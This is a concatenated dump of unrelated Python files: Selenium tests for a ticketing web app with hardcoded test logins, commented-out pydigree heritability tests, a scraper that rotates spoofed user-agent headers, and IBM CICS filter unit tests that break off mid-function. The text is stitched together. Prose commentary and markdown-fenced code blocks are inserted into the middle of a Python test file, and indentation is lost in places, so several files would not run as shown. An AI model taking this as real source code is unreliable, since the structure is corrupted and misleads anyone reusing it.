    # Test LogIn user/Index/Services/Active Tickets
    def test8_user_active_tickets(self):
        print("Testing user active tickets ... ")
        driver = self.driver
        driver.get("http://127.0.0.1:8000/home/login/")
        username_input = driver.find_element_by_name("username")
        username_input.send_keys('cristina.g')
        password_input = driver.find_element_by_name("password")
        password_input.send_keys('gcritest123')
        driver.find_element_by_name('Submit').click()
        # Asserting True index page text
        self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
        driver.find_element_by_name('services').click()
        # Asserting True Services page text information
        self.assertTrue(self.__is_text_present("Create Ticket"))
        driver.find_element_by_name('active_tickets').click()
        # Asserting True Open Tickets page text information
        self.assertTrue(self.__is_text_present("Active Tickets for Cristina George"))
        self.assertTrue(self.__is_text_present("Office License"))
        self.assertTrue(self.__is_text_present("MS 2010 Office license has expired."))
        self.assertTrue(self.__is_text_present("Medium"))
        self.assertTrue(self.__is_text_present("Sent"))
    # Test LogIn user/Index/Services/Create Order
    def test9_user_create_order(self):
        print("Testing user create order ... ")
        driver = self.driver
        driver.get("http://127.0.0.1:8000/home/login/")
        username_input = driver.find_element_by_name("username")
        username_input.send_keys('cristina.g')
        password_input = driver.find_element_by_name("password")
        password_input.send_keys('gcritest123')
        driver.find_element_by_name('Submit').click()
        # Asserting True index page text
        self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
        driver.find_element_by_name('services').click()
        # Asserting True Services page text information
        self.assertTrue(self.__is_text_present("Create Ticket"))
        driver.find_element_by_name('create_order').click()
        # Asserting True Create Order page text information
        self.assertTrue(self.__is_text_present("Place an Order"))
        # Populating form inputs
        category_select = Select(driver.find_element_by_id('type'))
        category_select.select_by_visible_text('Inventory Item')
        title_input = driver.find_element_by_name("title")
        title_input.send_keys('Desk Lamp')
        description_input = driver.find_element_by_name("description")
        description_input.send_keys('Improve office lighting')
        value_input = driver.find_element_by_name("value")
        value_input.send_keys('69')
        units_input = driver.find_element_by_name("units")
        units_input.send_keys('1')
        delivery_office_input = driver.find_element_by_name("delivery_office")
        delivery_office_input.send_keys('ERO201')
        priority_select = Select(driver.find_element_by_id('priority'))
        priority_select.select_by_visible_text('Medium Priority')
        driver.find_element_by_name('submit').click()
        # Asserting True confirmation message
        self.assertTrue(self.__is_text_present("Order successfully created! You will be contacted as soon as possible."))

    # Test LogIn user/Index/Services/Active Orders
    def test10_user_active_orders(self):
        print("Testing user active orders ... ")
        driver = self.driver
        driver.get("http://127.0.0.1:8000/home/login/")
        username_input = driver.find_element_by_name("username")
        username_input.send_keys('cristina.g')
        password_input = driver.find_element_by_name("password")
        password_input.send_keys('gcritest123')
        driver.find_element_by_name('Submit').click()
        # Asserting True index page text
        self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
        driver.find_element_by_name('services').click()
        # Asserting True Services page text information
        self.assertTrue(self.__is_text_present("Create Ticket"))
        driver.find_element_by_name('active_orders').click()
        # Asserting True Open Orders page text information
        self.assertTrue(self.__is_text_present("Active Orders for Cristina George"))
        self.assertTrue(self.__is_text_present("Desk Lamp"))
        self.assertTrue(self.__is_text_present("Improve office lighting"))
        self.assertTrue(self.__is_text_present("69.00"))
        self.assertTrue(self.__is_text_present("1"))
        self.assertTrue(self.__is_text_present("Medium"))
        self.assertTrue(self.__is_text_present("Sent"))
    # Test LogIn supervisor/Index/Services/Subordinates
    def test11_supervisor_subordinates(self):
        print("Testing supervisor subordinates view ... ")
        driver = self.driver
        driver.get("http://127.0.0.1:8000/home/login/")
        username_input = driver.find_element_by_name("username")
        username_input.send_keys('george.r')
        password_input = driver.find_element_by_name("password")
        password_input.send_keys('rgeotest123')
        driver.find_element_by_name('Submit').click()
        # Asserting True index page text
        self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
        driver.find_element_by_name('services').click()
        # Asserting True Services page text information
        self.assertTrue(self.__is_text_present("Manage staff members"))
        driver.find_element_by_name('subalterns').click()
        # Asserting True subordinates page text information
        self.assertTrue(self.__is_text_present("Active subalterns for George Rus"))
        self.assertTrue(self.__is_text_present("Cristina George"))
        self.assertTrue(self.__is_text_present("cristina.george@ticket.com"))
        self.assertTrue(self.__is_text_present("770"))
        self.assertTrue(self.__is_text_present("PDOM-DS"))
    # Test LogIn supervisor/Index/Services/Subordinates
    # Test LogIn supervisor/Index/Services/ApproveTickets
    def test12_supervisor_approve_tickets(self):
        print("Testing supervisor approve tickets ... ")
        driver = self.driver
        driver.get("http://127.0.0.1:8000/home/login/")
        username_input = driver.find_element_by_name("username")
        username_input.send_keys('george.r')
        password_input = driver.find_element_by_name("password")
        password_input.send_keys('rgeotest123')
        driver.find_element_by_name('Submit').click()
        # Asserting True index page text
        self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
        driver.find_element_by_name('services').click()
        # Asserting True Services page text information
        self.assertTrue(self.__is_text_present("Manage staff members"))
        driver.find_element_by_name('approve_tickets').click()
        # Asserting True open tickets page text information
        self.assertTrue(self.__is_text_present("Tickets pending the approval of George Rus"))
        self.assertTrue(self.__is_text_present("Cristina George"))
        self.assertTrue(self.__is_text_present("Office License"))
        self.assertTrue(self.__is_text_present("MS 2010 Office license has expired."))
        self.assertTrue(self.__is_text_present("Medium"))
        self.assertTrue(self.__is_text_present("Sent"))
        # Opening active ticket
        driver.find_element_by_name(str(self.id_ticket)).click()
        self.assertTrue(self.__is_text_present("Ticket Information"))
        self.assertTrue(self.__is_text_present("Cristina George"))
        self.assertTrue(self.__is_text_present("Office License"))
        # Approving Ticket
        status_select = Select(driver.find_element_by_id('status'))
        status_select.select_by_visible_text('Approved')
        title_comments = driver.find_element_by_name("comments")
        title_comments.send_keys('Ok')
        driver.find_element_by_name('submit').click()
        # Asserting True confirmation message
        self.assertTrue(self.__is_text_present("You have successfully updated the ticket status!"))
        # Asserting that the previously approved ticket is now removed from the list
        driver.get("http://127.0.0.1:8000/home/subalterns_tickets/")
        self.assertFalse(self.__is_text_present("Office License"))
        self.assertFalse(self.__is_text_present("MS 2010 Office license has expired."))
    # Test LogIn supervisor/Index/Services/ApproveTickets
    # Test LogIn supervisor/Index/Services/ApproveOrders
    def test13_supervisor_approve_orders(self):
        print("Testing supervisor approve orders ... ")
        driver = self.driver
        driver.get("http://127.0.0.1:8000/home/login/")
        username_input = driver.find_element_by_name("username")
        username_input.send_keys('george.r')
        password_input = driver.find_element_by_name("password")
        password_input.send_keys('rgeotest123')
        driver.find_element_by_name('Submit').click()
        # Asserting True index page text
        self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
        driver.find_element_by_name('services').click()
        # Asserting True Services page text information
        self.assertTrue(self.__is_text_present("Manage staff members"))
        driver.find_element_by_name('approve_orders').click()
        # Asserting True subordinates orders page text information
        self.assertTrue(self.__is_text_present("Orders pending the approval of George Rus"))
        self.assertTrue(self.__is_text_present("Desk Lamp"))
        self.assertTrue(self.__is_text_present("Improve office lighting"))
        self.assertTrue(self.__is_text_present("Medium"))
        self.assertTrue(self.__is_text_present("Sent"))
        # Opening active order
        driver.find_element_by_name(str(self.id_order)).click()
        self.assertTrue(self.__is_text_present("Order Information"))
        self.assertTrue(self.__is_text_present("Desk Lamp"))
        self.assertTrue(self.__is_text_present("Improve office lighting"))
        # Approving Order
        status_select = Select(driver.find_element_by_id('status'))
        status_select.select_by_visible_text('Approved')
        title_comments = driver.find_element_by_name("comments")
        title_comments.send_keys('Ok')
        driver.find_element_by_name('submit').click()
        # Asserting True confirmation message
        self.assertTrue(self.__is_text_present("You have successfully updated the order status!"))
        # Asserting that the previously approved order is now removed from the list
        driver.get("http://127.0.0.1:8000/home/subalterns_orders/")
        self.assertFalse(self.__is_text_present("Desk Lamp"))
    # Test LogIn HelpDesk/Index/Services/Employees
    def test14_helpdesk_employees(self):
        print("Testing helpdesk employees view ... ")
        driver = self.driver
        driver.get("http://127.0.0.1:8000/home/login/")
        username_input = driver.find_element_by_name("username")
        username_input.send_keys('gigi.h')
        password_input = driver.find_element_by_name("password")
        password_input.send_keys('hgigtest123')
        driver.find_element_by_name('Submit').click()
        # Asserting True index page text
        self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
        driver.find_element_by_name('services').click()
        # Asserting True Services page text information
        self.assertTrue(self.__is_text_present("View contact info for all employees"))
        driver.find_element_by_name('employees_list').click()
        # Asserting True employee page text information
        self.assertTrue(self.__is_text_present("Company Employees"))
        self.assertTrue(self.__is_text_present("Cristina George"))
        self.assertTrue(self.__is_text_present("cristina.george@ticket.com"))
        self.assertTrue(self.__is_text_present("770"))
        self.assertTrue(self.__is_text_present("George Rus"))
        self.assertTrue(self.__is_text_present("george.rus@ticket.com"))
        self.assertTrue(self.__is_text_present("021"))
    # Test LogIn HelpDesk/Index/Services/Active Tickets
    def test15_helpdesk_solve_ticket(self):
        print("Testing helpdesk solve ticket ... ")
        driver = self.driver
        driver.get("http://127.0.0.1:8000/home/login/")
        username_input = driver.find_element_by_name("username")
        username_input.send_keys('gigi.h')
        password_input = driver.find_element_by_name("password")
        password_input.send_keys('hgigtest123')
        driver.find_element_by_name('Submit').click()
        # Asserting True index page text
        self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
        driver.find_element_by_name('services').click()
        # Asserting True Services page text information
        self.assertTrue(self.__is_text_present("View contact info for all employees"))
        driver.find_element_by_name('solve_tickets').click()
        # Asserting True active tickets page text information
        self.assertTrue(self.__is_text_present("All Active Tickets"))
        self.assertTrue(self.__is_text_present("Cristina George"))
        self.assertTrue(self.__is_text_present("Office License"))
        self.assertTrue(self.__is_text_present("MS 2010 Office license has expired."))
        self.assertTrue(self.__is_text_present("Ok"))
        self.assertTrue(self.__is_text_present("Medium"))
        self.assertTrue(self.__is_text_present("Approved"))
        # Opening active ticket
        driver.find_element_by_name(str(self.id_ticket)).click()
        self.assertTrue(self.__is_text_present("Ticket Information"))
        self.assertTrue(self.__is_text_present("Cristina George"))
        self.assertTrue(self.__is_text_present("Office License"))
        self.assertTrue(self.__is_text_present("Processing"))
        # Closing Ticket
        status_select = Select(driver.find_element_by_id('status'))
        status_select.select_by_visible_text('Closed')
        title_comments = driver.find_element_by_name("comments")
        title_comments.send_keys('Solved')
        driver.find_element_by_name('submit').click()
        # Asserting True confirmation message
        self.assertTrue(self.__is_text_present("You have successfully updated the ticket status!"))
        # Asserting that the previously closed ticket is now removed from the list
        driver.get("http://127.0.0.1:8000/helpd/active_tickets/")
        self.assertFalse(self.__is_text_present("Office License"))
        self.assertFalse(self.__is_text_present("MS 2010 Office license has expired."))
    # Test LogIn HelpDesk/Index/Services/Closed Tickets
    def test16_helpdesk_solved_tickets(self):
        print("Testing helpdesk solved tickets ... ")
        driver = self.driver
        driver.get("http://127.0.0.1:8000/home/login/")
        username_input = driver.find_element_by_name("username")
        username_input.send_keys('gigi.h')
        password_input = driver.find_element_by_name("password")
        password_input.send_keys('hgigtest123')
        driver.find_element_by_name('Submit').click()
        # Asserting True index page text
        self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
        driver.find_element_by_name('services').click()
        # Asserting True Services page text information
        self.assertTrue(self.__is_text_present("View contact info for all employees"))
        driver.find_element_by_name('closed_tickets').click()
        # Asserting True closed tickets page text information
        self.assertTrue(self.__is_text_present("All Closed Tickets"))
        self.assertTrue(self.__is_text_present("Cristina George"))
        self.assertTrue(self.__is_text_present("Office License"))
        self.assertTrue(self.__is_text_present("MS 2010 Office license has expired."))
        self.assertTrue(self.__is_text_present("Solved"))
        self.assertTrue(self.__is_text_present("Medium"))
    # Test LogIn HelpDesk/Index/Services/Active Orders
    def test17_helpdesk_solve_order(self):
        print("Testing helpdesk solve order ... ")
        driver = self.driver
        driver.get("http://127.0.0.1:8000/home/login/")
        username_input = driver.find_element_by_name("username")
        username_input.send_keys('gigi.h')
        password_input = driver.find_element_by_name("password")
        password_input.send_keys('hgigtest123')
        driver.find_element_by_name('Submit').click()
        # Asserting True index page text
        self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
        driver.find_element_by_name('services').click()
        # Asserting True Services page text information
        self.assertTrue(self.__is_text_present("View contact info for all employees"))
        driver.find_element_by_name('solve_orders').click()
        # Asserting True active orders page text information
        self.assertTrue(self.__is_text_present("All Active Orders"))
        self.assertTrue(self.__is_text_present("Cristina George"))
        self.assertTrue(self.__is_text_present("Desk Lamp"))
        self.assertTrue(self.__is_text_present("Improve office lighting"))
        self.assertTrue(self.__is_text_present("Ok"))
        self.assertTrue(self.__is_text_present("Medium"))
        self.assertTrue(self.__is_text_present("Approved"))
        # Opening active order
        driver.find_element_by_name(str(self.id_order)).click()
        self.assertTrue(self.__is_text_present("Order Information"))
        self.assertTrue(self.__is_text_present("Cristina George"))
        self.assertTrue(self.__is_text_present("Desk Lamp"))
        self.assertTrue(self.__is_text_present("Improve office lighting"))
        self.assertTrue(self.__is_text_present("Processing"))
        # Closing Order
        status_select = Select(driver.find_element_by_id('status'))
        status_select.select_by_visible_text('Closed')
        title_comments = driver.find_element_by_name("comments")
        title_comments.send_keys('Solved')
        driver.find_element_by_name('submit').click()
        # Asserting True confirmation message
        self.assertTrue(self.__is_text_present("You have successfully updated the order status!"))
        # Asserting that the previously closed order is now removed from the list
        driver.get("http://127.0.0.1:8000/helpd/active_orders/")
        self.assertFalse(self.__is_text_present("Desk Lamp"))
        self.assertFalse(self.__is_text_present("Improve office lighting"))
    # Test LogIn HelpDesk/Index/Services/Closed Orders
    def test18_helpdesk_solved_orders(self):
        print("Testing helpdesk solved orders ... ")
        driver = self.driver
        driver.get("http://127.0.0.1:8000/home/login/")
        username_input = driver.find_element_by_name("username")
        username_input.send_keys('gigi.h')
        password_input = driver.find_element_by_name("password")
        password_input.send_keys('hgigtest123')
        driver.find_element_by_name('Submit').click()
        # Asserting True index page text
        self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
        driver.find_element_by_name('services').click()
        # Asserting True Services page text information
        self.assertTrue(self.__is_text_present("View contact info for all employees"))
        driver.find_element_by_name('closed_orders').click()
        # Asserting True closed orders page text information
        self.assertTrue(self.__is_text_present("All Closed Orders"))
        self.assertTrue(self.__is_text_present("Cristina George"))
        self.assertTrue(self.__is_text_present("Desk Lamp"))
        self.assertTrue(self.__is_text_present("Improve office lighting"))
        self.assertTrue(self.__is_text_present("Solved"))
        self.assertTrue(self.__is_text_present("Medium"))


users = entities_utils.get_employees()
# --- tests/test_mixedmodel.py (repo: jameshicks/pydigree, license: Apache-2.0) ---
import os
import numpy as np
import pydigree as pyd
from scipy.optimize import check_grad
from pydigree.stats.mixedmodel.mixedmodel import make_incidence_matrix
from pydigree.stats.mixedmodel import MixedModel
from pydigree.stats.mixedmodel.likelihood import ML, REML
testdir = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'test_data',
'h2test')
# A dataset simulated to have population h2 = 50%
# Evaluated by SOLAR to have h2 = 45.92%
pedigree_file = os.path.join(testdir, 'h2test.pedigrees')
phenotype_file = os.path.join(testdir, 'h2test.csv')
solar_h2 = 0.4592420
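The comments above quote a simulated h² of 50% and a SOLAR estimate of about 0.459. As a reminder, narrow-sense heritability is the additive genetic share of total phenotypic variance:

```python
def heritability(genetic_var, residual_var):
    # Narrow-sense h2 = sigma_g^2 / (sigma_g^2 + sigma_e^2)
    return genetic_var / (genetic_var + residual_var)

# Equal variance components give h2 = 0.5, matching the simulated dataset above.
assert heritability(1.0, 1.0) == 0.5
```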
# def test_make_incidence_matrix():
# phenlab = 'testvar'
# inds = [pyd.Individual(None, i) for i in range(6)]
# phens = [1,2,3,1,2,3]
# for ind, phen in zip(inds, phens):
# ind.phenotypes[phenlab] = phen
# observed = make_incidence_matrix(inds, phenlab)
# expected = np.array([1,0,0,0,1,0,0,0,1] * 2).reshape(-1,3)
# assert (observed==expected).all()
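The commented-out test above pins down what make_incidence_matrix should produce: one one-hot row per individual, one column per distinct phenotype level. A dependency-free sketch of that mapping (make_incidence_sketch is a hypothetical stand-in for pydigree's implementation, which returns a numpy array):

```python
def make_incidence_sketch(values):
    # Map each distinct phenotype level to a column index, then emit a
    # one-hot row per individual, mirroring the expected matrix above.
    levels = sorted(set(values))
    col = {v: i for i, v in enumerate(levels)}
    return [[1 if col[v] == j else 0 for j in range(len(levels))]
            for v in values]


# Same input as the commented test: levels 1, 2, 3 repeated twice.
print(make_incidence_sketch([1, 2, 3, 1, 2, 3]))
```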
# def makemm():
# peds = pyd.io.read_ped(pedigree_file)
# pyd.io.read_phenotypes(peds, phenotype_file)
# mm = MixedModel(peds, outcome='synthetic')
# mm.add_genetic_effect()
# return mm
# def test_reml_gradient():
# model = makemm()
# model.fit_model()
# lik = REML(model, info='newton')
# def grad(params):
# lik.set_parameters(params)
# return lik.gradient()
# def func(params):
# lik.set_parameters(params)
# return lik.loglikelihood()
# diff = check_grad(func, grad, [.5, .5])
# assert diff < 0.001
# assert check_grad(func, grad, [0.2, 0.8]) < 0.001
# assert check_grad(func, grad, [0.8, 0.2]) < 0.001
# assert check_grad(func, grad, [0.0, 1.0]) < 0.001
# assert check_grad(func, grad, [10, 20]) < 0.001
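The gradient tests lean on scipy.optimize.check_grad, which reports the distance between an analytic gradient and a finite-difference approximation. The same idea in plain Python (check_grad_sketch uses central differences and is only an illustration; scipy's routine differs in details):

```python
import math


def check_grad_sketch(func, grad, x, eps=1e-6):
    # Root-sum-square difference between the analytic gradient and a
    # central finite-difference approximation at the point x.
    diff = 0.0
    g = grad(x)
    for i in range(len(x)):
        xp, xm = list(x), list(x)
        xp[i] += eps
        xm[i] -= eps
        numeric = (func(xp) - func(xm)) / (2 * eps)
        diff += (numeric - g[i]) ** 2
    return math.sqrt(diff)


# f(x) = x0^2 + x1^2 has gradient (2*x0, 2*x1), so the check passes.
f = lambda x: sum(v * v for v in x)
g = lambda x: [2 * v for v in x]
assert check_grad_sketch(f, g, [0.5, 0.5]) < 1e-3
```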
# def test_ml_gradient():
# model = makemm()
# model.fit_model()
#     lik = ML(model, info='newton')
# def grad(params):
# lik.set_parameters(params)
# return lik.gradient()
# def func(params):
# lik.set_parameters(params)
# return lik.loglikelihood()
# diff = check_grad(func, grad, [.5, .5])
# assert diff < 0.001
# assert check_grad(func, grad, [0.2, 0.8]) < 0.001
# assert check_grad(func, grad, [0.8, 0.2]) < 0.001
# assert check_grad(func, grad, [0.0, 1.0]) < 0.001
# assert check_grad(func, grad, [10, 20]) < 0.001
# def test_reml_hessian():
# model = makemm()
# model.fit_model()
# lik = REML(model, info='newton')
# def hessian(params):
# lik.set_parameters(params)
# return lik.reml_hessian()
# def func(params):
# lik.set_parameters(params)
# return lik.loglikelihood()
# testpoint = np.array([0.5, 0.5])
# real_hess = hessian(testpoint)
# test_hess = approx_hessian(testpoint, func)
# diff = (test_hess - real_hess)
# assert np.abs(diff).sum() < 0.001
# def test_ml_hessian():
# model = makemm()
# model.fit_model()
# lik = ML(model, info='newton')
# def hessian(params):
# lik.set_parameters(params)
# return lik.ml_hessian()
# def func(params):
# lik.set_parameters(params)
# return lik.loglikelihood()
# testpoint = np.array([0.5, 0.5])
# real_hess = hessian(testpoint)
# test_hess = approx_hessian(testpoint, func, epsilon=.000001)
# diff = (test_hess - real_hess)
# assert np.abs(diff).sum() < 0.001
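approx_hessian, referenced above but never imported in this chunk, presumably differentiates the log-likelihood numerically twice. A generic central-difference Hessian sketch under that assumption (the name and signature here are illustrative, not pydigree's):

```python
def approx_hessian_sketch(x, func, eps=1e-5):
    # H[i][j] ~ (f(x+ei+ej) - f(x+ei-ej) - f(x-ei+ej) + f(x-ei-ej)) / (4*eps^2)
    n = len(x)
    H = [[0.0] * n for _ in range(n)]
    for i in range(n):
        for j in range(n):
            xpp, xpm, xmp, xmm = (list(x) for _ in range(4))
            xpp[i] += eps; xpp[j] += eps
            xpm[i] += eps; xpm[j] -= eps
            xmp[i] -= eps; xmp[j] += eps
            xmm[i] -= eps; xmm[j] -= eps
            H[i][j] = (func(xpp) - func(xpm) - func(xmp) + func(xmm)) / (4 * eps * eps)
    return H


# f(x) = x0^2 + 3*x0*x1 has constant Hessian [[2, 3], [3, 0]].
f = lambda x: x[0] ** 2 + 3 * x[0] * x[1]
H = approx_hessian_sketch([0.5, 0.5], f)
assert all(abs(H[i][j] - [[2, 3], [3, 0]][i][j]) < 1e-3
           for i in range(2) for j in range(2))
```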
# def test_ml_newton():
# model = makemm()
# model.maximize(method='NR', restricted=False)
# total_var = sum(model.variance_components)
# # Allow a deviation up to 5 percentage points
# assert (model.variance_components[-2]/total_var - solar_h2) < 0.05
# def test_ml_fisher():
# model = makemm()
# model.maximize(method='FS', restricted=False)
# total_var = sum(model.variance_components)
# # Allow a deviation up to 5 percentage points
# assert (model.variance_components[-2]/total_var - solar_h2) < 0.05
# def test_ml_ai():
# model = makemm()
# model.maximize(method='AI', restricted=False)
# total_var = sum(model.variance_components)
# # Allow a deviation up to 5 percentage points
# assert (model.variance_components[-2]/total_var - solar_h2) < 0.05
# def test_reml_fisher():
# model = makemm()
# model.maximize(method='FS', restricted=True)
# total_var = sum(model.variance_components)
# # Allow a deviation up to 5 percentage points
# assert (model.variance_components[-2]/total_var - solar_h2) < 0.05
# def test_reml_newton():
# model = makemm()
# model.maximize(method='NR', restricted=True)
# total_var = sum(model.variance_components)
# # Allow a deviation up to 5 percentage points
# assert (model.variance_components[-2]/total_var - solar_h2) < 0.05
# def test_reml_ai():
# model = makemm()
# model.maximize(method='AI', restricted=True)
# total_var = sum(model.variance_components)
# # Allow a deviation up to 5 percentage points
# assert (model.variance_components[-2]/total_var - solar_h2) < 0.05
# def test_reml_em():
# model = makemm()
# model.maximize(method='EM', restricted=True)
# total_var = sum(model.variance_components)
# # Allow a deviation up to 5 percentage points
#     assert (model.variance_components[-2]/total_var - solar_h2) < 0.05
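The maximize tests above all estimate heritability the same way: the genetic variance component, taken as the second-to-last entry of variance_components, divided by the total variance, then compared against the SOLAR estimate. A sketch with made-up component values (the [genetic, residual] ordering is an assumption), using abs() for the two-sided "deviation up to 5 percentage points" the comments describe:

```python
solar_h2 = 0.4592420  # SOLAR's heritability estimate for this dataset


def estimated_h2(variance_components):
    # h2 estimate: genetic variance (second-to-last component) / total variance
    return variance_components[-2] / sum(variance_components)


# Hypothetical fitted components: [genetic, residual]
assert abs(estimated_h2([0.46, 0.54]) - solar_h2) < 0.05
```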
# scrapegoat.py (edintronics/scrapegoat, MIT)
from bs4 import BeautifulSoup
import urllib2
import random
# IE10 - Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
# Chrome - Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
# Chrome (WinV2) - Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
# Safari iOS10 - Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1
# GSA on iOS10 - Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/22.0.141836113 Mobile/14C92 Safari/600.1.4
class Goat:
    """Tell the goat which pasture to graze and it returns with a pot of soup"""

    def __init__(self, pasture):
        self.hats = [
            "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
            "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36",
            "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1",
            "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/22.0.141836113 Mobile/14C92 Safari/600.1.4",
        ]
        self.food = BeautifulSoup(
            urllib2.urlopen(urllib2.Request(pasture, headers={"user-agent": self.putHatOn()})),
            "html.parser")

    def putHatOn(self):
        return random.choice(self.hats)
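Goat builds its request with Python 2's urllib2; under Python 3 the equivalent user-agent-spoofing request comes from urllib.request. A minimal sketch (the URL is a placeholder, and no network call happens until urlopen is actually invoked):

```python
import urllib.request

# Build the same kind of header-spoofing request with the Python 3 stdlib.
ua = "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"
req = urllib.request.Request("http://example.com", headers={"user-agent": ua})

# urllib normalizes header names, so the key is stored as 'User-agent'.
assert req.get_header("User-agent") == ua
```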
# tests/unit/modules/test_cmci_filters.py (ind1go/ibm_zos_cics, Apache-2.0)
# -*- coding: utf-8 -*-
# Copyright (c) IBM Corporation 2020
# Apache License, Version 2.0 (see https://opensource.org/licenses/Apache-2.0)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
from ansible_collections.ibm.ibm_zos_cics.plugins.modules import cmci_get
from ansible_collections.ibm.ibm_zos_cics.tests.unit.helpers.cmci_helper import (
HOST, PORT, CONTEXT, SCOPE, AnsibleFailJson,
set_module_args, exit_json, fail_json, cmci_module, CMCITestHelper
)
from ansible.module_utils import basic
import pytest
import re
from collections import OrderedDict
def test_query_criteria(cmci_module): # type: (CMCITestHelper) -> None
records = [{'name': 'bat', 'dsname': 'STEWF.BLOP.BLIP'}]
cmci_module.stub_records('GET', 'cicslocalfile', records, scope=SCOPE, parameters='?CRITERIA=%28FOO%3D%27BAR%27%29')
cmci_module.expect(result(
'https://winmvs2c.hursley.ibm.com:26040/CICSSystemManagement/'
'cicslocalfile/CICSEX56/IYCWEMW2?CRITERIA=%28FOO%3D%27BAR%27%29',
records=records
))
cmci_module.run(cmci_get, {
'cmci_host': HOST,
'cmci_port': PORT,
'context': CONTEXT,
'scope': 'IYCWEMW2',
'type': 'cicslocalfile',
'resources': {
'filter': {
'FOO': 'BAR'
}
}
})
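The stub above shows the wire format: each filter entry becomes (KEY='VALUE'), entries are joined with AND, and the whole expression is percent-encoded into the CRITERIA query parameter. A sketch of that encoding with the stdlib (criteria_param is illustrative, not the module's real helper):

```python
from urllib.parse import quote


def criteria_param(filters):
    # Render (KEY='VALUE') terms joined by AND, then percent-encode them.
    expr = ' AND '.join("(%s='%s')" % (k, v) for k, v in filters.items())
    return '?CRITERIA=' + quote(expr)


# Matches the parameters string stubbed in test_query_criteria above.
assert criteria_param({'FOO': 'BAR'}) == '?CRITERIA=%28FOO%3D%27BAR%27%29'
```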
def test_filter_multi(cmci_module): # type: (CMCITestHelper) -> None
records = [{'name': 'bat', 'dsname': 'STEWF.BLOP.BLIP'}]
filters = OrderedDict({})
filters['GOO'] = 'LAR'
filters['FOO'] = 'BAR'
cmci_module.stub_records('GET', 'cicslocalfile', records, scope=SCOPE,
parameters='?CRITERIA=%28GOO%3D%27LAR%27%29%20AND%20%28FOO%3D%27BAR%27%29')
cmci_module.expect(result(
'https://winmvs2c.hursley.ibm.com:26040/CICSSystemManagement/'
'cicslocalfile/CICSEX56/IYCWEMW2?CRITERIA=%28GOO%3D%27LAR%27%29%20AND%20%28FOO%3D%27BAR%27%29',
records=records
))
cmci_module.run(cmci_get, {
'cmci_host': HOST,
'cmci_port': PORT,
'context': CONTEXT,
'scope': 'IYCWEMW2',
'type': 'cicslocalfile',
'resources': {
'filter': filters
}
})
def test_complex_filter_and(cmci_module): # type: (CMCITestHelper) -> None
records = [{'name': 'bat', 'dsname': 'STEWF.BLOP.BLIP'}]
cmci_module.stub_records('GET', 'cicslocalfile', records, scope=SCOPE,
parameters='?CRITERIA=%28FOO%3D%27BAR%27%29%20AND%20%28GOO%3D%27LAR%27%29')
cmci_module.expect(result(
'https://winmvs2c.hursley.ibm.com:26040/CICSSystemManagement/'
'cicslocalfile/CICSEX56/IYCWEMW2?CRITERIA=%28FOO%3D%27BAR%27%29%20AND%20%28GOO%3D%27LAR%27%29',
records=records
))
cmci_module.run(cmci_get, {
'cmci_host': HOST,
'cmci_port': PORT,
'context': CONTEXT,
'scope': 'IYCWEMW2',
'type': 'cicslocalfile',
'resources': {
'complex_filter': {
'and': [{
'attribute': 'FOO',
'operator': '=',
'value': 'BAR'
}, {
'attribute': 'GOO',
'operator': '=',
'value': 'LAR'
}]
}
}
})
def test_complex_filter_or(cmci_module): # type: (CMCITestHelper) -> None
records = [{'name': 'bat', 'dsname': 'STEWF.BLOP.BLIP'}]
cmci_module.stub_records('GET', 'cicslocalfile', records, scope=SCOPE,
parameters='?CRITERIA=%28FOO%3D%27BAR%27%29%20OR%20%28GOO%3D%27LAR%27%29')
cmci_module.expect(result(
'https://winmvs2c.hursley.ibm.com:26040/CICSSystemManagement/'
'cicslocalfile/CICSEX56/IYCWEMW2?CRITERIA=%28FOO%3D%27BAR%27%29%20OR%20%28GOO%3D%27LAR%27%29',
records=records
))
cmci_module.run(cmci_get, {
'cmci_host': HOST,
'cmci_port': PORT,
'context': CONTEXT,
'scope': 'IYCWEMW2',
'type': 'cicslocalfile',
'resources': {
'complex_filter': {
'or': [{
'attribute': 'FOO',
'operator': '=',
'value': 'BAR'
}, {
'attribute': 'GOO',
'operator': '=',
'value': 'LAR'
}]
}
}
})
def test_complex_filter_operator(cmci_module): # type: (CMCITestHelper) -> None
records = [{'name': 'bat', 'dsname': 'STEWF.BLOP.BLIP'}]
cmci_module.stub_records('GET', 'cicslocalfile', records, scope=SCOPE,
parameters='?CRITERIA=%28NOT%28FOO%3D%3D%27BAR%27%29%29')
cmci_module.expect(result(
